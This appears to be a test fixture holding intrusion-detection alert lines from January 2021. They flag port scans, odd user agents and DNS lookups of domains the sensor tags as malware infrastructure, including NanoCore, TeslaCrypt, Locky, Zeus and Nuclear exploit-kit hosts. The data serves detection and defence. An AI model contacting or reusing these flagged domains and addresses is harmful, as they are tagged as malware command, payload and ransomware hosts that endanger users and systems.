    '"2021-01-11 01:13:32.000556" r2d2 2.200.108.59 22252,22255,22257,22260,22263,22265,22268,22270,22271,22275,22276,22278,22280,34944,35184,35232,35980,37614,38905,38906,38908,39558,42514,42688,43362,43596,45157,45158,45818,47820,49502,50496,50548,51208,53230,53396,54330,54780,55466,55902,57230,58496,59488,60648 77.53.81.105 21,6184,6393,10409,11639,12469,13486,14390,15737,18371,19009,23215,28315,29077,30398,31364,36626,39379,39974,44794,46046,53068,53546,54172,56432,60122,62244 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:13:34.584332" r2d2 2.200.109.177 16999 8.8.8.8 53 UDP DNS (sv1.iotak).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:13:32.000451" r2d2 2.200.108.59 22250,22253,22254,22256,22258,22259,22260,22262,22266,22271,22272,22275,22277,22279,22280,32832,33122,34276,35184,35768,36480,38212,38905,38906,39558,40170,41508,42688,43596,43804,44088,44208,44500,45192,45758,45830,46062,46236,47102,47820,48182,49640,51208,52446,53396,54550,54780,58584,59488,60324,60534 77.53.81.105 21,6537,8180,12469,13486,14340,14390,15150,16867,17367,19009,24261,26063,26922,26955,29077,30032,31828,32205,35603,36899,37703,38162,41218,46046,47501,52465,53546,54158,55650,59537,60122,61382,62244,63163 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:13:33.000007" r2d2 2.200.108.59 22272,22273,22274,22277,22278,35232,38212,38907,38908,41508,43062,47302,48402,49502,53230,54330,58902 77.53.81.105 21,11639,16507,18371,23215,31828,39974,47501,58180,58979,64073 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:13:43.380934" r2d2 2.200.110.232 65052 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:13:41.000550" r2d2 45.95.202.106 32850,35102,35782,36672,46218,48120,50522,51344,53006,55106,59254,59500 2.200.104.85 81,89,90,5000,6001,6003,6004,8001,8080,8082,8888,60001 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:13:41.000513" r2d2 45.95.202.106 33660,33712,34646,39626,45884,46320,46372,50610,50650,53090,54950,55336,56298,56360,59786 2.200.104.85 82,84,85,86,88,91,1024,3000,6002,8081,8083,8090,8200,9000,50000 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:14:18.761276" r2d2 10.43.193.193 50350 10.1.194.234 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:14:18.764452" r2d2 2.200.107.146 18089 205.251.197.155 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:14:18.762749" r2d2 2.200.110.233 55474 2.200.107.168 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:14:18.765614" r2d2 2.200.110.232 49275 2.200.107.168 53 UDP DNS (www).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:14:18.767392" r2d2 2.200.107.146 46360 173.245.59.92 53 UDP DNS (www).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:14:13.047873" r2d2 178.17.174.14 53424 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; VER#8B#80837549546745484869484851; .NET4.0C; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:14:27.046500" r2d2 2.200.110.232 64295 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 01:14:27.074305" r2d2 2.200.110.233 64069 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 01:14:27.865673" r2d2 2.200.110.232 65231 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:14:27.889034" r2d2 2.200.110.233 65178 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:14:31.866584" r2d2 2.200.110.232 64183 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:14:31.867920" r2d2 2.200.107.146 4906 77.72.229.253 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:14:52.166535" r2d2 178.17.174.14 54516 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SearchToolbar 1.2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:14:59.609815" r2d2 2.200.110.232 63886 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:15:36.937840" r2d2 2.200.110.232 64566 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:15:36.989716" r2d2 2.200.110.233 64393 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:15:37.887905" r2d2 2.200.110.232 65366 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:15:37.889570" r2d2 2.200.107.146 48685 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:15:49.145896" r2d2 10.36.192.126 59217 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:16:04.898020" r2d2 2.200.109.58 58932 193.0.14.129 53 UDP DNS (acre.itbrazil).ml "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:16:04.897850" r2d2 2.200.109.58 15643 193.0.14.129 53 UDP DNS (brasilia.itbrazil).ml "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:16:04.917852" r2d2 2.200.109.58 31037 185.21.168.1 53 UDP DNS (acre.itbrazil).ml "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:16:13.301829" r2d2 10.36.192.126 59299 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:16:21.647955" r2d2 10.3.160.42 15531 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:16:21.747719" r2d2 10.3.160.42 15531 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:16:21.848952" r2d2 10.3.160.42 15531 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:16:22.747798" r2d2 10.3.160.42 15531 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:16:43.380676" r2d2 2.200.110.232 65435 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:16:43.395602" r2d2 2.200.110.232 64871 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:16:40.026651" r2d2 178.72.71.120 1725 2.200.107.138 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:16:47.921878" r2d2 2.200.110.233 63447 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:17:36.004041" r2d2 178.17.174.14 37800 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:17:36.004034" r2d2 178.17.174.14 37800 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:17:37.751991" r2d2 178.17.174.14 37940 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbARS/5.14.1.20007\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:17:43.074181" r2d2 178.17.174.14 38588 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.0; FunWebProducts; GTB7.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; NET_mmhpset; XF_mmhpset\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:17:36.004042" r2d2 178.17.174.14 37800 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:17:43.074187" r2d2 178.17.174.14 38588 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.0; FunWebProducts; GTB7.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; NET_mmhpset; XF_mmhpset\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:17:43.074186" r2d2 178.17.174.14 38588 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.0; FunWebProducts; GTB7.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; NET_mmhpset; XF_mmhpset\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:17:57.922190" r2d2 2.200.110.232 64947 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:17:57.924030" r2d2 2.200.107.146 53260 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:17:57.950734" r2d2 2.200.110.233 49265 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:17:59.611462" r2d2 2.200.110.232 63966 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:18:27.675529" r2d2 10.1.19.42 59165 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:18:43.397366" r2d2 2.200.110.232 64963 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:18:43.399207" r2d2 2.200.107.146 5101 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:18:59.608011" r2d2 2.200.110.232 64538 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:18:59.609913" r2d2 2.200.107.146 12596 199.249.112.1 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:18:59.625024" r2d2 2.200.107.146 11705 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:18:59.622723" r2d2 2.200.110.232 63453 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:19:06.995758" r2d2 2.200.110.233 63769 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:19:07.956920" r2d2 2.200.110.233 64369 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:19:43.381041" r2d2 2.200.110.232 65225 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:19:43.383430" r2d2 2.200.107.146 55857 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:19:43.678147" r2d2 10.1.19.42 59173 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:19:44.416824" r2d2 178.17.174.14 45436 2.200.109.24 80 TCP UA "MS Internet Explorer (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; MS Internet Explorer; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:19:44.416917" r2d2 178.17.174.14 45436 2.200.109.24 80 TCP UA "MS Internet Explorer (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; MS Internet Explorer; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:19:44.416911" r2d2 178.17.174.14 45436 2.200.109.24 80 TCP UA "MS Internet Explorer (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; MS Internet Explorer; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:20:06.636329" r2d2 2.200.110.232 65503 2.200.107.169 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:20:06.639045" r2d2 2.200.107.146 64348 178.62.208.8 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:20:07.071130" r2d2 2.200.110.232 63852 2.200.107.169 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 01:20:07.072535" r2d2 2.200.107.146 45403 205.251.199.82 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 01:20:15.445296" r2d2 178.17.174.14 47144 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProductsp; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MS-RTC LM 8; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.45)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:20:17.956751" r2d2 2.200.110.232 49470 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:20:17.989206" r2d2 2.200.110.233 65209 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:20:22.027551" r2d2 10.3.160.42 15533 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:20:22.129074" r2d2 10.3.160.42 15533 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:20:22.230415" r2d2 10.3.160.42 15533 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:20:22.427432" r2d2 10.3.160.42 15533 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:20:15.445304" r2d2 178.17.174.14 47144 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProductsp; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MS-RTC LM 8; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.45)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:20:22.727103" r2d2 10.3.160.42 15533 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:20:23.130854" r2d2 10.3.160.42 15533 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:20:24.227220" r2d2 10.3.160.42 15533 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:20:15.445302" r2d2 178.17.174.14 47144 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProductsp; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MS-RTC LM 8; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.45)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:20:26.766891" r2d2 2.200.110.232 63691 2.200.107.169 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:20:26.768279" r2d2 2.200.107.146 43354 46.101.179.64 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 01:20:31.165341" r2d2 178.17.174.14 47628 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; InfoPath.2; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:20:43.394196" r2d2 2.200.110.232 49491 2.200.107.169 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:20:48.779013" r2d2 2.200.109.50 61564 8.8.8.8 53 UDP DNS (sv1.iotak).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 01:20:59.609093" r2d2 2.200.110.232 49296 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:20:59.626334" r2d2 2.200.110.232 64114 2.200.107.169 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:21:00.329863" r2d2 10.1.81.47 60287 10.1.20.51 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 01:21:26.990689" r2d2 2.200.110.233 63931 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:21:27.061108" r2d2 2.200.110.233 63437 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:21:27.062680" r2d2 2.200.107.146 26171 190.9.129.56 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:21:27.194615" r2d2 2.200.110.233 65516 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:21:27.196143" r2d2 2.200.107.146 12411 173.201.73.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:21:27.988226" r2d2 2.200.110.232 49305 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:21:27.989812" r2d2 2.200.107.146 10294 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:21:28.024809" r2d2 2.200.110.233 49314 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:21:46.099240" r2d2 2.200.110.232 65432 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:21:46.149268" r2d2 2.200.110.233 64209 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:21:47.722656" r2d2 2.200.104.184 61245 205.251.193.194 53 UDP DNS ofhappinyer.com "pushbug (malicious)" (static)\n' +
    '"2021-01-11 01:21:52.315936" r2d2 2.200.110.233 65346 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:21:52.318803" r2d2 2.200.107.146 40685 3.95.184.151 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:21:59.624301" r2d2 2.200.110.232 63981 2.200.107.169 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:21:59.626828" r2d2 2.200.107.146 60091 78.47.109.127 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:22:22.217140" r2d2 10.3.160.42 15534 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:22:22.316833" r2d2 10.3.160.42 15534 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:22:22.416925" r2d2 10.3.160.42 15534 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:22:22.617168" r2d2 10.3.160.42 15534 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:22:24.418702" r2d2 10.3.160.42 15534 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:22:29.786413" r2d2 2.200.105.226 58383 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:22:29.817429" r2d2 2.200.105.226 58008 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:22:29.817435" r2d2 2.200.105.226 58008 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:22:29.817517" r2d2 2.200.105.226 58008 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:22:36.850988" r2d2 2.200.110.232 49374 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:22:36.853337" r2d2 2.200.107.146 50703 192.52.178.30 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:22:36.889429" r2d2 2.200.110.233 64112 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:22:37.192514" r2d2 2.200.110.233 49153 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:22:37.194727" r2d2 2.200.107.146 3211 97.74.100.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:22:37.272310" r2d2 2.200.110.233 63272 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:22:38.031842" r2d2 2.200.110.232 64314 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:22:38.058585" r2d2 2.200.110.233 64566 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:22:42.864012" r2d2 2.200.97.1 52835 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:22:43.381151" r2d2 2.200.110.232 63712 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:22:43.397828" r2d2 2.200.107.146 59910 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:22:56.538024" r2d2 2.200.110.233 64176 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:22:56.539760" r2d2 2.200.107.146 43238 194.0.11.104 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:23:31.000463" r2d2 2.200.108.59 22750,22753,22755,22757,22758,22761,22762,22767,22768,22769,22772,22777,22778,33552,33558,34324,35274,35456,35924,38872,39246,39250,39251,39878,40746,42662,43208,43542,45106,45468,45556,46972,48134,49576,49892,53004,53266,53370,55198,55310,55548,55838,55994,56196,57008,57270,58982,59282,60006,60840 77.53.81.105 21,5885,8825,9679,10870,11377,11664,12813,17125,20208,21061,27503,28835,32201,33984,34057,35012,36120,36226,36280,38672,39338,43336,45351,47597,48690,49388,50844,51751,53818,57123,57880,59410,59435 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:23:31.000469" r2d2 2.200.108.59 22749,22752,22754,22756,22759,22760,22761,22763,22764,22767,22770,22773,22774,22775,22777,22778,22779,22780,33440,33552,33852,34260,34324,34340,34402,34464,35300,35674,35924,36404,37094,37248,37756,37914,37932,39200,39248,39600,39748,39772,40410,40498,40746,41340,41708,42224,42394,42554,42662,42782,43006,43208,43302,43310,43446,43480,43652,43910,43930,44434,44914,45024,45466,45467,45469,45470,45996,47926,48134,48650,49396,49576,49712,49892,50960,53592,54046,54954,55194,55310,55778,55838,55848,56942,57270,58570,59228,59400,60558 77.53.81.105 21,5267,7084,8428,8603,8825,8899,9710,11377,11518,11664,12208,12490,12813,13341,13670,13951,17000,17125,20657,20876,21030,21061,23321,23775,25772,28616,28835,29979,31144,31426,31594,31598,32444,32507,33224,33251,33984,34898,35020,35186,35458,35880,36226,37237,38293,38391,39824,40385,43048,43112,46688,48145,49602,50427,50510,50634,51751,52334,55177,57126,58776,59410,59435,60654,62207,63012 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:23:32.000018" r2d2 2.200.108.59 22766,22769,22770,22771,22772,22775,22776,22780,33296,33440,34464,34872,35104,35274,35300,35456,36338,36474,37248,38128,38432,39247,39248,39249,39251,39702,39748,39772,39970,40410,40498,41708,41758,41938,42066,42554,43302,44774,45024,45469,45470,45471,45472,45556,46396,46692,48522,48650,49180,49396,49554,50328,50394,51202,51386,52192,52440,53592,53694,53954,54812,54946,55194,55548,55778,56988,58538,59400,60068 77.53.81.105 21,5267,8428,8540,8984,9863,12208,13341,13670,14418,16100,17194,17251,19838,23321,23799,24244,25772,29652,29896,30071,31594,31598,32201,32507,33251,35458,35529,35538,37237,38814,39824,42072,45351,45648,45916,46688,49388,49602,49928,50510,50901,52041,53421,53436,54119,54337,57126,57880,58261,58805,60589,63583,64255 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:23:33.000451" r2d2 2.200.108.59 33296,33852,35104,35478,36338,36626,37478,37756,37914,39200,39600,39702,39970,40892,41216,41340,41938,42394,43310,43446,43464,43480,44434,45472,46396,47624,49554,49712,50328,50832,50960,51048,52192,52440,54812,55350,58570,59228 77.53.81.105 21,7084,8899,11434,11518,12490,14588,15265,17251,20876,23775,23926,24244,24807,25439,28616,29393,29896,31144,33224,34898,35538,37896,38190,38293,38762,38814,42072,43631,45916,48145,50901,52334,54337,55177,58776,58805,60589,63583 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:23:43.397507" r2d2 2.200.110.232 64420 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
